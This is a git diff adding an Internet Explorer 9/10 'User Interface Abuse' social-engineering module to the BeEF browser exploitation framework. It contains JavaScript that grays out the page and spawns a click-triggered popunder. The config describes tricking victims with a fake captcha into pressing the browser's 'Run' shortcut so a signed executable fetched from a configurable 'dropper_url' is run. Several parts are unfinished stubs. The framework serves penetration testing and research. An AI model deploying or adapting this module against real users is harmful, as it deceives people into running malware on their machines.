diff --git a/modules/social_engineering/ui_abuse_ie/command.js b/modules/social_engineering/ui_abuse_ie/command.js
new file mode 100644
index 000000000..7147fcace
--- /dev/null
+++ b/modules/social_engineering/ui_abuse_ie/command.js
@@ -0,0 +1,77 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ if(beef.browser.isIE()){
+
+ getLanguage = function(){
+ var lang = null;
+ switch (beef.browser.getBrowserLanguage().substring(0,2)){
+ case "en":
+ lang = "en";
+ break;
+ case "it":
+ lang = "it";
+ break;
+ }
+ return lang;
+ };
+
+ grayOut = function(vis, options) {
+ var options = options || {};
+ var zindex = options.zindex || 50;
+ var opacity = options.opacity || 70;
+ var opaque = (opacity / 100);
+ var bgcolor = options.bgcolor || '#000000';
+ var dark=document.getElementById('darkenScreenObject');
+ if (!dark) {
+ var tbody = document.getElementsByTagName("body")[0];
+ var tnode = document.createElement('div');
+ tnode.style.position='absolute';
+ tnode.style.top='0px';
+ tnode.style.left='0px';
+ tnode.style.overflow='hidden';
+ tnode.style.display='none';
+ tnode.id='darkenScreenObject';
+ tbody.appendChild(tnode);
+ dark=document.getElementById('darkenScreenObject');
+ }
+ if (vis) {
+ var pageWidth='100%';
+ var pageHeight='100%';
+ dark.style.opacity=opaque;
+ dark.style.MozOpacity=opaque;
+ dark.style.filter='alpha(opacity='+opacity+')';
+ dark.style.zIndex=zindex;
+ dark.style.backgroundColor=bgcolor;
+ dark.style.width= pageWidth;
+ dark.style.height= pageHeight;
+ dark.style.display='block';
+ } else {
+ dark.style.display='none';
+ }
+ };
+
+ spawnPopunder = function(){
+ //TODO this will be replaced with a webpage served by BeEF
+ var pu = window.open('popunder.html','','top=0, left=0,width=500,height=500');
+ pu.blur();
+ };
+
+ if(beef.browser.isIE9()){
+ // [TAB] + shortcut
+ $(document.body).attr('onclick', 'spawnPopunder();');
+ }else if(beef.browser.isIE10()){
+ // just shortcut
+ $(document.body).attr('onclick', 'spawnPopunder();');
+
+ //TODO Using Gray-out, display the fake captcha with the 2 gifs (base64 the gif content and use dataURI inline image)
+ }else{
+ // unsupported IE version
+ }
+ }
+});
+
diff --git a/modules/social_engineering/ui_abuse_ie/config.yaml b/modules/social_engineering/ui_abuse_ie/config.yaml
new file mode 100644
index 000000000..28ceca63c
--- /dev/null
+++ b/modules/social_engineering/ui_abuse_ie/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ ui_abuse_ie:
+ enable: true
+ category: "Social Engineering"
+ name: "User Interface Abuse (IE 9/10)"
+ description: "This module is based on Rosario Valotta research (https://sites.google.com/site/tentacoloviola/). The executable to be run needs to be signed (best thing is signing it with Symantec EV-SSL). The victim is tricked to press [TAB]+R (IE 9) or simply R (IE 10), which are keyboard shortcuts for the modeless dialog option "Run". Depending on the browser language, the modeless dialog shortcuts are different. For example, R for English, E for Italian. In order to achieve such behavior, a fake captcha is displayed."
+ authors: ["Rosario Valotta", "antisnatchor"]
+ target:
+ working: ["IE"]
\ No newline at end of file
diff --git a/modules/social_engineering/ui_abuse_ie/module.rb b/modules/social_engineering/ui_abuse_ie/module.rb
new file mode 100644
index 000000000..6fc52d4a1
--- /dev/null
+++ b/modules/social_engineering/ui_abuse_ie/module.rb
@@ -0,0 +1,28 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# Based on the PoC by Rosario Valotta
+# Ported to BeEF by antisnatchor
+# For more information see: https://sites.google.com/site/tentacoloviola/
+################################################################################
+class Ui_abuse_ie < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'dropper_url', 'ui_label' => 'Executable URL (must be signed)', 'value' => 'http://dropper_url/dropper.exe'}
+ ]
+ end
+
+ #TODO pre-execute -> read popunder.html, replace placeholder, and serve it mounting a new URL
+
+ def post_execute
+ content = {}
+ content['results'] = @datastore['results']
+ save content
+ end
+
+end
+
diff --git a/modules/social_engineering/ui_abuse_ie/templates/en-captcha.jpg b/modules/social_engineering/ui_abuse_ie/templates/en-captcha.jpg
new file mode 100644
index 000000000..bf296ff71
Binary files /dev/null and b/modules/social_engineering/ui_abuse_ie/templates/en-captcha.jpg differ
diff --git a/modules/social_engineering/ui_abuse_ie/templates/it-captcha.jpg b/modules/social_engineering/ui_abuse_ie/templates/it-captcha.jpg
new file mode 100644
index 000000000..9fa515fea
Binary files /dev/null and b/modules/social_engineering/ui_abuse_ie/templates/it-captcha.jpg differ
diff --git a/modules/social_engineering/ui_abuse_ie/templates/popunder.html b/modules/social_engineering/ui_abuse_ie/templates/popunder.html
new file mode 100644
index 000000000..fc4319318
--- /dev/null
+++ b/modules/social_engineering/ui_abuse_ie/templates/popunder.html
@@ -0,0 +1,13 @@
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file